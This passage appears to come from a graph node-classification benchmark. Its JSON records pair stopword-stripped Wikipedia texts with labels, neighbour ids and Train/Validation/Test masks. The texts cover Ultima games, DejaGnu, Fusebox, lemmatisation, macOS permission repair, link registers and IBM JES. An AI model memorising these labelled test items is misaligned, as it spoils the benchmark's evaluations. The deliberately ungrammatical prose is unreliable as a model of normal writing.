anticlimactic magazine patricia fitzgibbons 1985 reviewed macintosh version complimented graphics criticized audio stated game adequately use computer user interface describing using mouse aggravating fitzgibbons concluded even though mac conversion far ideal ultima iii enjoyable game well worth hefty price 1993 scorpia stated ultima iii best first trilogy surprisingly quiet nonviolent defeat villain presaged later games resolutions less combative spirit magazine stated february 1994 exodus really first ultima coherent plot beyond typical dungeon romp compute 1984 stated ultima iii ushers exciting new era fantasy role-playing combination superb graphics music excellent playability makes exodus modern-day masterpiece noted cloth map extensive documentation thrilling 3-d dungeons game use time spell system magazine concluded lord british outdone latest work art ... delight play info stated lord british latest offering also best ... many wonderful hours spent unravelling secrets magazine gave amiga version four stars compared five stars 64 version stating graphics user interface could better amiga-tized chicago tribune called ultima iii one best computer games providing epic adventure last months famitsu reviewed 1987 famicom remake scored 32 40 1984 softline readers named game third most-popular apple eighth most-popular atari program 1983 adventure game year prize computer gaming world nowiki /nowiki 1985 reader poll editors wrote although ultima iii well year feel still best game kind score 7.55 10 1988 ultima iii among first members computer gaming world hall fame honoring games rated highly time readers 1996 magazine ranked 144th best game time featuring one nastiest villains grace computer screen demon figure appeared front box caused religious fundamentalists protest made accusations game corrupting youth america encouraging satan worshiping along factors led richard garriott develop next game based virtues ultima series became famous",
    "neighbors": [
      5260,
      9006,
      7023,
      9166,
      4530,
      11443,
      4533,
      4536
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4528,
    "label": 9,
    "text": "DejaGnu:dejagnu dejagnu framework testing programs main script called runtest goes directory looking configuration files runs tests given criteria purpose dejagnu package provide single front end tests part gnu project licensed gpl based expect turn based tcl current maintainers rob savoye ben elliston dejagnu strong history testing due tcl base tcl used extensively companies oracle sybase test products dejagnu allows work much structured tests grouped according tool testing test run merely calling root project directory look directory folders starting run .exp files folder one field dejagnu particularly well suited embedded system design allows testing done remotely development boards separate initialization files created operating system board mainly focuses embedded targets remote hosts dejagnu thus popular many gnu projects universities private companies essential files files set tool apache run tests apache",
    "neighbors": [
      7847,
      5032,
      4298,
      5612,
      10732,
      7983,
      692,
      9118
    ],
    "mask": "None"
  },
  {
    "node_id": 4529,
    "label": 9,
    "text": "Fusebox_(programming):fusebox programming fusebox web application framework cfml php originally released 1997 final version 5.5.2 released may 2012 january 2012 rights fusebox transferred teratech team five developers removed rights placed framework hands community fusebox intended easy learn provide benefits helping developers structure code set simple conventions fusebox also allowed advanced developers build large applications leveraging design patterns object-oriented programming techniques wish fusebox provided web application developers standardized structured way developing applications using relatively straightforward easy learn set core files encouraged conventions addition framework fusebox became closely associated web application development methodology developed proponents known flip fusebox lifecycle process many people refer fusebox methodology fact development framework flip however methodology framework ported used asp jsp lasso perl/cgi php well though cfml php versions fusebox versions gain momentum fusebox dealt primarily effort wiring together view states pages controller actions form submits etc front-end business-logic tier framework address creating maintaining business logic database interaction service layers original concepts behind fusebox based household idiom electrical fusebox controls number circuits one fuse fusebox web application requests routed single point usually codice_1 cfml processed fusebox core files application divided number circuits usually sub-directories intended contain related functionality circuit application divided small files called fuses perform simple tasks fusebox considered implementation front controller common design pattern urls within fusebox web application usually form codice_2 codice_3 name circuit codice_4 xml-defined method within circuit known fuseaction query-string variable name fuseaction vary depending configuration parameters applications using fusebox need use action variable fuseaction fusebox encourages enforce separation presentation logic business logic uses number file naming conventions encourage separation presentation files begin dsp display lay layout database access files begin qry query general business files begin act action typical file names format prefix filename like dsp_loginform.cfm additional naming conventions used fusebox developers common ones another concept fusebox encourages parameterize exit points web page coding variables set circuit control file exit points known xfas exit fuseactions idea parameterizing exit points web page flow control updated easily allowing reuse web pages fragments thereof associated framework strictly part concept fusedocs semi-formalized form documentation written xml specifies inputs outputs fuse file third-party tools available use fusedocs things like generate test harness code fusebox several major revisions years fusebox 3 control files written underlying programming language e.g. fbx_switch.cfm cfml fusebox 4 later versions use xml control files fusebox.xml circuit.xml framework components written using underlying programming language e.g fusebox5.cfm cfml theory helps improve tool support framework also allowed pre-parsing generation single template processing fuseaction greatly increasing performance fusebox 5.5 allows xml files omitted certain conventions followed fusebox 1 grew conversation cf-talk mailing list april 1998 steve nelson gabe roffman credited creating original fusebox though first fusebox program written josh cyr methodology constantly evolving beyond whitepaper handful examples official documentation existed developers exposed fusebox early days craig girard steve nelson along hal helms nat papovich wrote book fusebox methodology techniques published 2000 fusion authority programmers followed practices described book said fusebox 2 hal helms built upon fusebox 2 called ideas extended fusebox xfb fusebox 3 written primarily hal helms john quarto-von tivadar nat papovich effort leading members fusebox community incorporate xfb ideas reusable library known core files simple api allowed application code communicate core files upon release fall 2001 fusebox became framework rather methodology subsequent 3.01 release addressed minor issues fusebox 3 something sea-change fusebox 2 original principles remained relatively unchanged fusebox 2 fusebox 3 application structured differently fusebox 4 complete rewrite fusebox 3 license core files open source held private company owned hal helms john quarto-von tivadar fusebox corporation appears defunct corporation fusebox 4.1 introduced new xml grammar elements beyond available 4.0 let declare instantiate manipulate objects com java coldfusion components well web services features provided fusebox developers means tying object-oriented models i.e business-logic directly controllers however many fusebox developers used object-oriented highly structured models earlier versions fusebox current versions without use grammar elements 2006 fusebox corporation asked sean corfield take lead developing next iteration fusebox fusebox 5 another complete rewrite new features improved performance fusebox 5 nearly completely maintained backwards-compatibility fusebox 4.1 november 2006 fusebox corporation transferred ownership core files fusebox website teratech guidance teratech president fusebox speaker michael smith teratech announced fusebox remain open source seeking increase community involvement project fusebox 5.1 subsequent releases licensed apache source license 2.0 february 2007 members team fusebox met frameworks conference bethesda maryland created plan action community involvement using volunteers nine different areas fusebox release focused primarily adding set conventions allow creation fusebox applications without xml configuration files use new features instead xml called implicit fusebox release fusebox 5.5.1 march 2008 last release sean corfield august 2008 adam haskell took development became frustrated fusebox organization attempted branch new framework called fuseng ng next generation star trek reference fuseng quickly lost steam ended without release january 2012 team five community developers led john blayter announced fusebox mailing list obtained rights copyright fusebox teratech framework code copyright removed available github encourage community participation fusebox 5.6 goals announced never implemented",
    "neighbors": [
      1920,
      3462,
      8582,
      3469,
      2062,
      9614,
      2576,
      9618,
      148,
      1812,
      4507,
      6941,
      9245,
      10526,
      4512,
      8739,
      3876,
      11688,
      4777,
      5165,
      7987,
      692,
      2485,
      7862,
      3895,
      5048,
      8883,
      6074,
      9144,
      190,
      5314,
      9666,
      8644,
      1353,
      595,
      84,
      4056,
      6493,
      479,
      102,
      8554,
      8691,
      628,
      3705,
      11259
    ],
    "mask": "None"
  },
  {
    "node_id": 4530,
    "label": 3,
    "text": "Ultima_I:_The_First_Age_of_Darkness:ultima first age darkness ultima later known ultima first age darkness simply ultima first game ultima series role-playing video games created richard garriott originally released apple ii first published united states california pacific computer company registered copyright game september 2 1980 officially released june 1981 since release game completely re-coded ported many different platforms 1986 re-code ultima commonly known available version game ultima revolves around quest find destroy gem immortality used evil wizard mondain enslave lands sosaria gem possession killed minions roam terrorize countryside player takes role stranger individual summoned another world end rule mondain game follows endeavors stranger task involves progressing many aspects game play including dungeon crawling space travel game one first definitive commercial computer rpgs considered important influential turning point development genre throughout years come addition influences rpg genre also first open-world computer game world ultima presented variety different ways overworld projected topdown third-person view dungeons displayed first-person one-point perspective scenarios player character controlled keyboard directional arrows shortcut keys used commands attack b board character creation start ultima unlike simplified version traditional tabletop role-playing games player presented number points distribute various statistics affect competence certain aspects gameplay example adding points strength statistic increase amount damage inflicted foe adding points charisma results cheaper deals merchants portion character creation completed player given choice four races human elf dwarf bobbit hobbit-like creature depending race picked points added various statistics e.g elves receive points agility statistic dwarves receive strength points race chosen player given list four classes choose distribute additional points appropriate statistics classes fighter cleric wizard thief player also asked choose gender player character though stat difference simple sprite character looks four statistics used gameplay hit points food experience points coin gold original release hit points determine health character fewer hp character closer death hit points obtained variety ways including acts emerging alive dungeon giving tribute payment one eight lords sosaria food consumed every two tiles character moves except castles towns food supply drops zero character die food bought towns prevent situation occurring experience points received successfully battle monsters determine character levels one thousand points needed progress new level vital item near end game obtained player reached eighth level coin used buy things game world weapons spells food obtained defeating monsters rescuing princesses castles game also sports arcade-like first-person space shooter section gameplay element appeared ultima subsequent games series player participates real-time space combat environment confronted enemy spaceships must shoot order progress along story richard garriott says added wanted fill every space disk everything possibly could ultima set fictional world sosaria land broken four different continents land ruled total eight different lords two world four land masses four continents contain two castles quests obtained player two types quests given castles—one entails visiting certain location main map killing specific type monster dungeons fulfilling former type quest gives stat boosts latter gains player important item needed reach endgame also variety towns different goods services purchased world dungeons explored populated forests mountain ranges lakes oceans towns exactly alike original release game dungeons maps different designed rather randomly created castles differ different quests may assigned 1986 remake variety added appearance content towns castles sosaria inhabited numerous monsters beasts attack player character sight also ruins places interest continent usually somewhat hard-to-reach places small islands player enter order receive rewards usually form weapon statistic boost order solve quests two main characters featured ultima mondain evil wizard antagonist induced reign terror world sosaria protagonist character player choosing game features lord british richard garriott first game akalabeth introduction characters iolo shamino three characters become staples nearly future ultima games see list ultima characters story ultima revolves around evil wizard mondain rule kingdom sosaria according game back story mondain created evil gem 1000 years ago granted immortality since mondain released monsters beasts upon land ravage villages towns sosaria cause nobles bicker amongst effort stop mondain dominion lord british searches person bring wizard end call answered player player informed way defeat mondain travel back time kill gem immortality created majority game spent searching time machine way activate four lords game one realm hold gem allow time machine work four gems found exchange gem lord ask player complete quest involves traveling dungeon killing specific creature achieved lord hand gem time machine also needs found purchasing space shuttle traveling outer space prerequisite —the player must become space ace destroying 20 enemy ships order complete game task completed rescuing princess reveal location time machine always appears north castle princess held prisoner main character travel back time face mondain completed gem immortality destroying gem requirement beating game well killing wizard mondain dead player transported one thousand years future rewarded lord british richard garriott started development ultima unexpected success previous game large sections akalabeth used subroutines within ultima create first-person dungeon sections game towns quests plot user interface added original akalabeth code ultima completed star wars elements also added including spaceships lightsabers development ultima done garriott freshman year university texas help friend ken w. arnold finished less year ultima coded applesoft basic apple ii computer arnold wrote code assembly language tile-based graphics system first game genre unlike akalabeth commercial sale afterthought hobbyist endeavor ultima approached much professional attitude right start project game first planned called ultimatum discovered name already use board game company shortened ultima garriott later commented title wrote first game course idea would ever second california pacific computer company published ultima 1981 apple ii june 1982 sold 20,000 copies went sell 50,000 copies sierra online re-released ultima atari 8-bit computers 1986 origin systems completely re-coded game assembly re-released 1986 remake re-coded entirely assembly significantly improved running speed able handle superior graphics small cosmetic changes content also made addition another castle map variant three new city maps introduction traveling monsters outdoors section division money player separate copper silver gold coins first released apple ii december 23 1986 ultima first age darkness ports commodore 64 dos/ega also released many subsequent releases made later years including 1989 version msx2 published japan pony canyon well apple ii specific port late 1994 vitesse 1997 dos/ega version ultima released electronic arts part ultima collection softline stated 1981 ultima seems best available apple ii role-playing game magazine called graphics impressive concluded retails 39.95 well worth price computer gaming world 1991 1993 called game truly epic scope stating among first outdoor settings npc conversations noting unbalanced combat system magazine concluded ultima classic missed",
    "neighbors": [
      712,
      5260,
      4527,
      9137,
      4533,
      1142,
      4536,
      5436,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 4531,
    "label": 0,
    "text": "Lemmatisation:lemmatisation lemmatisation lemmatization linguistics process grouping together inflected forms word analysed single item identified word lemma dictionary form computational linguistics lemmatisation algorithmic process determining lemma word based intended meaning unlike stemming lemmatisation depends correctly identifying intended part speech meaning word sentence well within larger context surrounding sentence neighboring sentences even entire document result developing efficient lemmatisation algorithms open area research many languages words appear several inflected forms example english verb 'to walk may appear 'walk 'walked 'walks 'walking base form 'walk one might look dictionary called lemma word association base form part speech often called lexeme word lemmatisation closely related stemming difference stemmer operates single word without knowledge context therefore discriminate words different meanings depending part speech however stemmers typically easier implement run faster reduced accuracy may matter applications fact used within information retrieval systems stemming improves query recall accuracy true positive rate compared lemmatisation nonetheless stemming reduces precision true negative rate systems instance document indexing software like lucene store base stemmed format word without knowledge meaning considering word formation grammar rules stemmed word might valid word 'lazy seen example stemmed many stemmers 'lazi purpose stemming produce appropriate lemma – challenging task requires knowledge context main purpose stemming map different forms word single form rules-based algorithm dependent upon spelling word sacrifices accuracy ensure example 'laziness stemmed 'lazi stem 'lazy trivial way lemmatization simple dictionary lookup works well straightforward inflected forms rule-based system needed cases languages long compound words rules either hand-crafted learned automatically annotated corpus morphological analysis published biomedical literature yield useful results morphological processing biomedical text effective specialised lemmatisation program biomedicine may improve accuracy practical information extraction tasks",
    "neighbors": [
      5122,
      2440,
      2059,
      6798,
      11538,
      1044,
      5399,
      538,
      7599,
      4662,
      3127,
      2488,
      10557,
      6208,
      3533,
      5197,
      6223,
      8538,
      5857,
      1890,
      7780,
      7918,
      8046,
      8688,
      10231,
      8440,
      7164
    ],
    "mask": "None"
  },
  {
    "node_id": 4532,
    "label": 2,
    "text": "Repair_permissions:repair permissions repairing disk permissions troubleshooting activity commonly associated macos operating system apple efficacy repairing permissions troubleshoot application errors debated bsd layer macos responsible file-system security including management unix posix permissions model applications depend correct assignment interpretation permissions order function properly repairing permissions involves checking permissions set files folders volume macos installed list correct posix permissions correcting discrepancies list correct permissions compiled consulting various bill-of-materials .bom files typically files stored within reduced-size installer package .pkg files receipts folder local library directory /library/receipts volume checked whenever user installs software uses macos installer package format bill-of-materials file created consulted future permission repair files whose permissions incorrectly altered administrator administrator operating root privileges poorly designed installer package installed similar privileges cause wide array problems ranging application errors inability boot macos repairing permissions become necessary become increasingly less versions panther 10.3 os x el capitan apple introduced security feature called system integrity protection enabled root privileges longer able change system files folders including permissions permissions repairs instead performed automatically upon system installs updates end disk utility well corresponding diskutil command-line utility lost ability repair permissions systems prior os x el capitan permissions repair performed selecting startup volume clicking repair disk permissions button first aid section disk utility operation also performed using diskutil command-line utility el capitan user instead use two command-line utilities pkgutil repair particular packages /usr/libexec/repair_packages repair standard set system packages cases user disable system integrity protection change permissions system files directories macos sierra /usr/libexec/repair_packages available permissions also repaired using third-party utilities apotek applejack prosoft engineering drive genius",
    "neighbors": [
      1509,
      811,
      7983,
      5492,
      10036,
      6264,
      700
    ],
    "mask": "Train"
  },
  {
    "node_id": 4533,
    "label": 3,
    "text": "Ultima_II:_The_Revenge_of_the_Enchantress:ultima ii revenge enchantress ultima ii revenge enchantress released august 24 1982 apple ii usco pa-317-502 second role-playing video game ultima series second installment ultima age darkness trilogy also official ultima game published sierra on-line controversy sierra royalties pc port game led series creator richard garriott start company origin systems plot ultima ii revolves around evil enchantress minax taking world exacting revenge player player defeat mondain player travels time acquire means defeat minax restore world peace ultima ii larger game world ultima hosts advances graphics gameplay gameplay similar previous game series scope game bigger several places explore even though like solar system planets dungeons towers required complete game game player travel several different time periods earth using time doors periods time legends mythological period pangea 300 250 million years ago b.c 1423 dawn civilization a.d. 1990 aftermath 2112 player also travel space planets solar system visited game story player learns lover dark wizard mondain enchantress minax threatening earth disturbances space-time continuum player must guide hero time solar system order defeat evil plot young minax survived mentor lover death hands stranger went hiding several years later minax got older powerful mondain minax wanted avenge death lover used time doors created mondain defeat travel time legends place located origin times sent evil minions different time eras also used dark powers disturb fabric time influence men ultimately destroyed far future nearly wiping humanity lord british called hero crush minax evil plans stranger answered british call game begins stranger starting quest defeat minax minax castle named shadow guard reached time doors similar moongates later games even enchanted ring required pass force fields inside hero hunts sorceress time legends pursues teleports throughout castle destroys quicksword enilno even though ultima set fictional land sosaria ultima ii borrowed characters story ultima relocated earth garriott explained narrative perspective earth needed used basis comparison due time travel element later games ultima series ret-conned assumed ultima ii actually happened sosaria earth create continuity among games ultima ii garriott first program wrote completely assembly language instead interpreted basic playing speed reaction time vastly improved original release ultima since garriott attending university texas time took almost two years create ultima ii including learning assembly one month tom luhrs author popular apple ii arcade game apple-oids ultima ii first game series include cloth map inside box would become staple franchise map illustrated time doors linked inspired one seen film time bandits time doors california pacific computer published garriott first two games financial difficulties pay full royalties publishers approached garriott insisted including map sierra on-line agreed provided garriott left university technical assistance developed first major assembly-language project two versions map produced first version heavier thicker material map found large boxed 8 x11 apple ii atari 800 versions game later production runs game featured much smaller box lighter weight map despite reservations richard garriott chuck bueche original apple ii version game copy-protected using sierra new spiradisc system original apple ultima ii received audiovisual upgrade 1989 bringing graphics date recent games series much done ultima enhanced version available part ultima trilogy i-ii-iii box set released year discontinued months later commodore ibm versions ultima trilogy include original unenhanced versions game respective platforms game re-released several times later cd-rom pc compilations including 1998 ultima collection re-releases missing necessary map files planets earth however map planet x intact game still winnable modern fast computers also generate divide zero error attempting run game issues addressed fan patches created voyager dragon fan series available website exodus project game known run without errors acceptable speed dosbox environment provided missing map files present ultima ii first game series officially ported platforms apple ii atari version released late 1983 several months apple original requires atari 800 810 disk drive game mostly direct port apple ii utilizing computer high resolution graphics works similar manner apple ii hgr mode otherwise take advantage atari advanced features c64 port apparently released programmer credited bobbit could finish consequence missing gameplay elements also simplified title screen text characters instead dragon graphic versions otherwise commodore 64 version takes advantage platform advanced graphics sound ibm version ultima ii dos game run self-booting disk unusual game released 1983 supports cga graphics pc speaker sound also uses cpu timing hence run fast anything except 8088 pc ultima ii designed dos 1.x support subdirectories save games must directory game files pc port also prone generating divide zero errors crashing dos prompt 1985 sierra released port ultima ii macintosh 128/512 along ultima iii would classic ultima games available macintosh family game compatible mac os versions system 6 run system 7.5 patch atari st port one earliest commercially released games system coming shortly computer june 1985 launch utilizes mostly simple block graphics little enhancement st hardware capabilities runs within tos self-booting disk atari st games softline 1983 stated ultima ii continues interplanetary saga creative programming flair far beyond scope fantasy adventure games magazine concluded lord british another greater hit hands ... ultimate real-time type fantasy games micro computer gaming world 1983 gave ultima ii positive review noting many improvements predecessor particularly amount detail magazine praised large size game world even though little necessary complete game suggesting additional scenarios would added leading ultimate quest 1991 1993 magazine scorpia called good sequel original game k-power gave game 7 points 10 magazine described animated graphic adventure game stated ultima ii sophisticated quicker pace predecessor fascinating world concluded game unique storyline original pc magazine gave ultima ii 15.5 points 18 also praising game great big wonderful world ultima ii sold 50,000 1982 100,000 copies date nominated best adventure game home computer 1983 origins game fair losing knight diamonds",
    "neighbors": [
      4527,
      10449,
      4530,
      4536,
      477
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4534,
    "label": 3,
    "text": "Link_register:link register link register special-purpose register holds address return function call completes efficient traditional scheme storing return addressed call stack sometimes called machine stack link register require writes reads memory containing stack save considerable percentage execution time repeated calls small subroutines link register used many instruction set architectures powerpc arm pa-risc architectures sparc register purpose another name case output register 7 o7 usage link register general-purpose register done instruction set architectures allows faster calls leaf subroutines subroutine non-leaf passing return address register still result generation efficient code thunks e.g function whose sole purpose call another function arguments rearranged way subroutines benefit use link register saved batch callee-used registers—e.g arm subroutine pushes registers 4-7 along link register lr single instruction codice_1 pipelining memory writes required",
    "neighbors": [
      9911,
      9964,
      5358,
      5040,
      8944,
      1399,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4535,
    "label": 2,
    "text": "Job_Entry_Subsystem_2/3:job entry subsystem 2/3 job entry subsystem jes component ibm mainframe operating systems responsible managing batch workloads modern times two distinct implementations job entry system called jes2 jes3 designed provide efficient execution batch jobs job processing divided several phases provide parallelism pipelining phases include input processing jobs read interpreted execution phase jobs run output processing job output printed stored dasd jobs phase execution usually said reside particular queue example jobs currently executing execution queue improve i/o efficiency jes performs spooling provides multiple jobs simultaneous access common storage volume jes uses structure called checkpoint backup information currently executing jobs associated output checkpoint used restore jobs output event unexpected hardware software failures although jes2 jes3 provide core functionality certain features may present one jes differences one jes may favored certain customer installations jcl used define jobs jes2 jes3 small changes usually need made jcl get job written one jes run os/360 batch job processing limited operational flexibility performance addressed two field-developed packages called houston automatic spooling priority hasp attached support processor asp hasp developed ibm federal systems division contractors johnson space center houston originally managed job scheduling print punch output single os/360 computer multi access spool capability added let peer computers share common job queue print/punch output queues introduction system/370 1972 ibm rewrote hasp become standard part system renamed job entry subsystem 2 jes2 introduced os/vs2 release 2 also known mvs 1973 many years hasp labels removed source code messages issued jes2 still prefixed codice_1 several jes2 commands continue support specification either codice_2 codice_3 maintain backwards compatibility asp initially stood attached support processor developed provide efficient use multiple os/360 systems shared workload allowed one central system distribute jobs multiple connected systems asp announced march 1967 year reported running stably asp evolved design 7094/7044 direct coupled system using data channel data channel communication attaching ibm 7044 peripheral processor throughput doubled typical asp configuration small mainframe 360/40 called support system controlled one 360/65 larger processors called main systems computers connected selector channels host attached channel-to-channel adapters early form short distance point-to-point computer networking asp required purchase additional computer manage input output hosts running job workload economically justified high cost standalone byte-multiplexor channels needed drive printers punched card reader devices 360/50 smaller systems built-in byte multiplexor channel whereas faster 360/65 larger systems required relatively expensive standalone unit using asp made possible avoid cost byte multiplexor channel offloading job scheduling print card handling also offloaded functions larger machines increased reliability another advantage offset added hardware cost one main systems could fail taken offline maintenance without taking whole complex asp primarily targeted large government agencies defense contractors might many six 360/65s scheduled managed separate asp machine uncommon variant local asp lasp single large machine asp functions running machine 1970s notable installation asp princeton university controlling ibm 360/91 mainframe 1973 ibm rewrote asp renamed jes3 supporting mvs also jes os/vs1 often referred jes1 addition master mstr subsystem built modern z/os operating system start jobs run outside control jes including primary jes source code provided ibm customers asp hasp many customers made substantial enhancements programs incorporated official product far installations made use hasp asp contemporary z/os systems many jes2 installations jes3 unique history ibm continues ship jes2 jes3 source code instead object code unlike components operating system improve maintainability serviceability user-written enhancements jes provides set exit points pass control jes user programs key points processing extensions provide custom functionality special commands custom print page headings non-standard job processing 2017 ibm released statement direction jes2 strategic jes meaning future development efforts focused jes2 rather jes3 ibm reassured customers jes3 continue supported end-of-support date announced february 2019 ibm announced z/os 2.5 expected released 2021 last version z/os include jes3",
    "neighbors": [
      11131,
      11236,
      8037,
      6342,
      7881,
      3916,
      7053,
      340,
      437,
      9814,
      3323,
      2172
    ],
    "mask": "Test"
  },
  {
    "node_id": 4536,
    "label": 3,
    "text": "Ultima_IV:_Quest_of_the_Avatar:ultima iv quest avatar ultima iv quest avatar first released 1985 apple ii fourth series ultima role-playing video games first age enlightenment trilogy shifting series hack slash dungeon crawl gameplay age darkness predecessors towards ethically-nuanced story-driven approach ultima iv much larger game world predecessors overworld map sixteen times size ultima iii puzzle-filled dungeon rooms explore ultima iv advances franchise dialog improvements new means travel exploration world interactivity 1996 computer gaming world named ultima iv 2 best games time list pc designer richard garriott considers game among favorites ultima series ultima iv followed release 1988 ultima iv among computer role-playing games perhaps first game story center asking player overcome tangible ultimate evil defeat members triad evil previous three ultima games world sosaria underwent radical changes geography three quarters world disappeared continents rose sank new cities built replace ones lost eventually world unified lord british rule renamed britannia lord british felt people lacked purpose great struggles triad concerned spiritual well-being unfamiliar new age relative peace proclaimed quest avatar needed someone step forth become shining example others follow unlike rpgs game set age darkness prosperous britannia resembles renaissance italy king arthur camelot object game focus main character development virtuous life—possible land peace—and become spiritual leader example people world britannia game follows protagonist struggle understand exercise eight virtues proving understanding virtues locating several artifacts finally descending dungeon called stygian abyss gain access codex ultimate wisdom protagonist becomes avatar conversely actions game could remove character gained virtues distancing construction truth love courage greater axiom infinity—all required complete game though avatarhood exclusive one chosen person hero remains known avatar throughout later games time passes increasingly regarded myth instead simply choosing stats assign points first three ultima games players asked various ethical dilemmas gypsy fortune-teller using remotely tarot-like cards eight virtues situations one correct resolution rather players must rank eight virtues whichever stands highest priority determines type character play example choosing compassion creates bard honor paladin sacrifice tinker also first ultima playing human necessary eliminating races elves dwarves bobbits found previous games however even first three ultima could chosen player characters never non-player characters non-human races although profession embodies particular virtue become avatar player must achieve enlightenment eight virtues virtue affects npcs interact player enlightenment virtues achieved player actions well meditation shrines shrines virtues scattered britannia requiring player possess corresponding virtue rune allowing entry meditation correctly repeating virtue mantra three times shrine player gains insight ultimately enlightenment virtue seer hawkwind lord british castle provides player feedback progress virtues offering advice actions improve standing eight virtues informing ready visit shrine elevation chastising character hath strayed far path avatar player may encouraged give alms poor improve sacrifice never flee battle improve honor players equally able lower virtue in-game actions stealing crops food lowering honesty selecting bragging response dialog certain characters lowers humility actions minor effect virtue progress certain actions immediate devastating effect player progress multiple virtues attacking npc sleep technically game similar although much larger first ultima feature real conversation system whereas npcs earlier games would give one canned answer talked players could interact specifying subject conversation subject determined either standard set questions name job health information gleaned previous answers characters many sub-quests arranged around users playing game second time could save considerable time knowing answers key questions frequently required travel another city talk another npc least one case player asked sent may require yet another round trip cities another addition dungeon rooms uniquely designed combat areas dungeons supplemented standard combat randomly appearing enemies ultima iv open world game quests completed order fetch quests although turn-based game clock runs game running player act npcs monsters may move time passes time important aspect game certain actions performed certain times world britannia first introduced full world map series greatly change later games player may travel britannia foot horseback across sea ship air lighter air device speed ease travel affected mode travel well terrain wind eight virtues avatar relationship three principles truth love courage gameplay designed around follows richard garriott stated receive customer feedback first three games neither california pacific computer sierra on-line forwarded mail company released ultima iii garriott—who attended interdenominational christian sunday school teenager—realized partly letters enraged parents earlier games immoral actions like stealing murder peaceful citizens necessary least useful actions order win game features might objectionable garriott stated wanted become good storyteller make certain story content 90 games including first three ultima games called go kill evil bad guy stories said ultima iv first one ethical overtones also better told story shay addams garriott official biographer wrote decided people going look hidden meaning work n't even exist would introduce ideas symbols meaning significance deemed worthwhile give something could really think encourage sense responsibility character actions players intended feel playing transported fantasy realm separate person garriott removed gameplay elements believed would prevent players identifying personally character playing non-human retrospect 1up.com described ultima iv direct barb self-appointed moral crusaders sought demonize rpgs complained irony seeing 'evil rpg better present christian admonition back faith works quiet modesty bible-waving watchdog decrying medium seems lost game moral dilemmas designed give players opportunity reap temporary rewards amoral behavior realize later penalized garriott hoped would approach later dilemmas thoughtfulness near end game took advantage encourage players overthink puzzles question morality choices one point players seemingly required murder innocents revealed demons disguise though one playtester threatened quit dilemma garriott refused remove game reasoning served purpose provoking emotional response concept virtues inspired tv show avatars hindu mythology described avatars master 16 different virtues eight virtues used game derived combinations truth love courage set motivators garriott found worked best also found one favorite films wizard oz game took two years develop twice garriott described playtesting slightly rushed make christmas season one finish playing game time went publishing like contemporary origin games ultima iv developed apple ii series ported computers partially garriott apple ii user/coder partially developing games first made ports easier garriott said 1984 commodore 64 atari 8-bit sprites hardware sound chips made porting apple far difficult perhaps even impossible ... apple version never get done like previous games ultima iv permit saving dungeons technical limitations garriott described non-trivial ankh used onward symbol avatar virtuous path chosen garriott saw film logan run like previous ultima richard garriott wrote core code however games getting complex one person handle required call outside assistance programming tasks familiar music optimized disk routines ultima iv first game series require 64k apple ii primarily targeted newer apple iie iic although still capable running apple ii+ language card used boost system 64k garriott still using ii+ time happened ultima iii ultima iv also included support mockingboard sound card enabled apple ii users 3-voice music custom disk routines allowed ultima iv faster disk access previous games also important growing size game caused use two floppy disks instead one dialog two npcs apple ii release accidentally entered leaving default test states one npcs elusive game provided player final answer would require complete game character responding properly players forced guess correct answer find sources outside game complete bug would later acknowledged ultima v npc appears admits mistake player c64 port first series take full advantage computer hardware rather simply converting sound graphics apple ii include in-game music came two 1541 disks like apple ii side 1 disk 1 labeled program copy protected disk sides overworld town dungeon user instructed make backups ultima iv also added support two disk drives case user would keep overworld side disk 1 drive 0 flip town/dungeon disk needed drive 1 overworld disk also used load/save player progress one biggest criticisms c64 port lack disk fast loader made extremely slow disk access speed-optimized disk routines apple version ultima iv final game series ported atari 8-bit family game still designed support 48k atari 800 even though four models 64k/128k atari 8-bit computers released one 64k-upgradable model starting two half years earlier order fit game 48k atari 8-bit version cut music support reason 48k made requirement instead 64k requirement apple ii version whereas earliest apple ii models upgradable 64k atari 400/800 officially upgradable 48k since apple version programmed require 64k apple 6502 code ported create atari 8-bit commodore 64 version would required extra programming selectively use 48k/64k including music support 64k machines since atari 8-bit market smallest installed bases game initially released special support provided similar reasons game distributed earliest 90k atari 810 disk format require disk drive upgrade players thus occupies four disks instead two disks apple ii commodore 64 versions similar c64 port ibm version ultima iv released two years 8-bit versions takes proper advantage hardware first time instead rushed conversion apple ii ega tandy graphics support added well proper hard disk support game finally supported dos 2.x subdirectories however music ibm version even though tandy 1000 series 3-voice sound chip atari st version ultima iv released 1987 amiga version 1988 extremely similar pc port fully utilize machines respective hardware features particular amiga version 16-color graphics although amiga could display 64 screen without using copper processor make color palette changes however atari st version support midi music one could play music connected midi synthesizer sampler ports made use mouse limited use native operating system windowing environment mouse cursor support dialog boxes requesting disks etc. like ultima iii ultima iv released nes fci pony canyon version titled ultima quest avatar released 1990 nes port ultima iv different versions graphics completely redone music dialogue options greatly reduced among gameplay changes player seven recruitable characters player party time one could versions character four player could would stay hostel castle britannia requiring player return change characters however combat system fairly close personal computer games additional option use automated combat additionally spell-casting simplified removing need mix spells puzzles removed well port also replaced character julia tinker male character named julius changes done memory limitations single cartridge instead multiple floppy diskettes ultima iv quest avatar master system ultima ported sega platform released 1990 ported published sega port features completely re-drawn graphics although unlike nes port style retained origin version simpler conversation system unlike nes version uses regular ultima iv background music although master system easily capable displaying complex first-person scenes found ultima iv see phantasy star version dungeons viewed top-down perspective much like ultima vi released year seems cartridges produced european market contain multi-lingual english french german manual books original version well folded paper map books different colour three editions blue uk version fully translated fit inside game box graphical error version gypsy picture man mustache even though gypsy referred throughout text xu4 cross-platform game engine recreation ultima iv development dreamcast linux mac os x risc os windows two remakes using neverwinter nights engine online version written adobe flash march 2011 electronic arts sent dmca cease desist notice fan project 2015 also fan-made remaster project commodore 64 version game released source code github addressing bugs improving aspects game ultima iv available free gog.com publisher ip owner electronic arts released game freeware 2011 promote free-to-play remake would release 2013 garriott stated 1985 interview working ultima iv part 2 ultima v ultima v appeared global sales ultima iv surpassed 400,000 copies mid-1989 scorpia computer gaming world 1986 called incredible game criticizing fact experience came combat stated became tedious scorpia concluded waiting classic ... go get game became first replace —the top-rated adventure game five years—in magazine reader poll named ultima iv game year 1986 1987 scorpia cited ultima iv taking genre away hack slash— first time crpg whose focus character development many monsters kill much loot pick —in 1991 1993 called favorite game 1994 stated maybe nothing ever surpass retiring reviewing games called all-time number one favorite rpg june 1986 dragon hartley pattie lesser called ultima iv impressive complex adventure date total adventuring environment takes 